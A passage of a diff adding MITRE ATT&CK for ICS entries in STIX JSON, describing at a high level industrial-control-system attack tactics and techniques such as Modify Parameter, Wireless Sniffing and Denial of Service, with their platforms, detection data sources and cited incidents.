Control](https://attack.mitre.org/tactics/TA0106) techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary’s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.\n\n[Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828), [Theft of Operational Information](https://attack.mitre.org/techniques/T0882), and [Damage to Property](https://attack.mitre.org/techniques/T0879) are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impact", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279", + "created": "2019-03-14T18:44:44.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0105", + "external_id": "TA0105" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Persistence", + "description": "The adversary is trying to maintain their foothold in your ICS environment.\n\nPersistence consists of techniques that adversaries use to maintain access to ICS systems and devices across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that allow them to secure their ongoing activity and keep their foothold on systems. This may include replacing or hijacking legitimate code, firmware, and other project files, or adding startup code and downloading programs onto devices.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "persistence", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0110", + "external_id": "TA0110" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:19:16.160Z", + "name": "Execution", + "description": "The adversary is trying to run code or manipulate system functions, parameters, and data in an unauthorized way.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network [Discovery](https://attack.mitre.org/tactics/TA0102) and [Collection](https://attack.mitre.org/tactics/TA0100), impact operations, and inhibit response functions.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "execution", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0104", + "external_id": "TA0104" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment.\n\nCommand and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use commonly available resources and mimic expected network traffic to avoid detection and suspicion. For instance, commonly used ports and protocols in ICS environments, and even expected IT resources, depending on the target network. Command and Control may be established to varying degrees of stealth, often depending on the victim’s network structure and defenses.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "command-and-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0101", + "external_id": "TA0101" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:18:50.880Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal.\n\nCollection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of [Discovery](https://attack.mitre.org/tactics/TA0102), to compile data on control systems and targets of interest that may be used to follow through on the adversary’s objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plan operations. For example, information repositories on plant data at a high level or device specific programs at a low level. Sensitive floor plans, vendor device manuals, and other references may also be at risk and exposed on the internet or otherwise publicly accessible.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "collection", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0100", + "external_id": "TA0100" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Evasion", + "description": "The adversary is trying to avoid security defenses.\n\nEvasion consists of techniques that adversaries use to avoid technical defenses throughout their campaign. Techniques used for evasion include removal of indicators of compromise, spoofing communications, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. Methods of defense evasion for this purpose are often more passive in nature.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "evasion", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0103", + "external_id": "TA0103" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:15:17.020Z", + "name": "Impair Process Control", + "description": "The adversary is trying to manipulate, disable, or damage physical control processes.\n\nImpair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use [Inhibit Response Function](https://attack.mitre.org/tactics/TA0107) techniques in tandem, to assist with the successful abuse of control processes to result in [Impact](https://attack.mitre.org/tactics/TA0105).", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impair-process-control", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0106", + "external_id": "TA0106" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Block Command Message", + "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Process: Process Termination" + ], + "type": "attack-pattern", + "id": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0803", + "external_id": "T0803" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Process: Process Termination", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Command: Command Execution", + "Service: Service Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0881", + "external_id": "T0881" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-04-05T14:15:29.756Z", + "name": "Modify Parameter", + "description": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. \n\nAn adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Human-Machine Interface" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Asset: Asset Inventory", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0836", + "external_id": "T0836" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Controller Tasking", + "description": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. \n\nAccording to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. (Citation: IEC February 2013) An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.\n\nTasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the task, Organization Block 1 (OB1).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Application Log: Application Log Content", + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0821", + "external_id": "T0821" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Wireless Sniffing", + "description": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. \n\nAdversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. (Citation: Bastille April 2017) Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. (Citation: Gallagher, S. April 2017) \n\nIn the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These messages were later replayed to trigger the alarm systems. (Citation: Gallagher, S. April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ICSCoE Japan" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0887", + "external_id": "T0887" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018", + "description": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. 2018, April Guide to Industrial Wireless Systems Deployments Retrieved. 2020/12/01 ", + "url": "https://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdf" + }, + { + "source_name": "Gallagher, S. April 2017", + "description": "Gallagher, S. 2017, April 12 Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack Retrieved. 2020/12/01 ", + "url": "https://arstechnica.com/information-technology/2017/04/dallas-siren-hack-used-radio-signals-to-spoof-alarm-says-city-manager/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of View", + "description": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0829", + "external_id": "T0829" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Activate Firmware Update Mode", + "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0800", + "external_id": "T0800" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of Control", + "description": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. \n\nMethods of Manipulation of Control include: \n\n* Man-in-the-middle \n* Spoof command message \n* Changing setpoints \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. (Citation: Shelley Smith February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0831", + "external_id": "T0831" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:16:01.922Z", + "name": "Denial of Service", + "description": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. \n\nSome ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) \n\nAdversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. \n\nAdversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0814", + "external_id": "T0814" + }, + { + "source_name": "Common Weakness Enumeration January 2019", + "description": "Common Weakness Enumeration 2019, January 03 CWE-400: Uncontrolled Resource 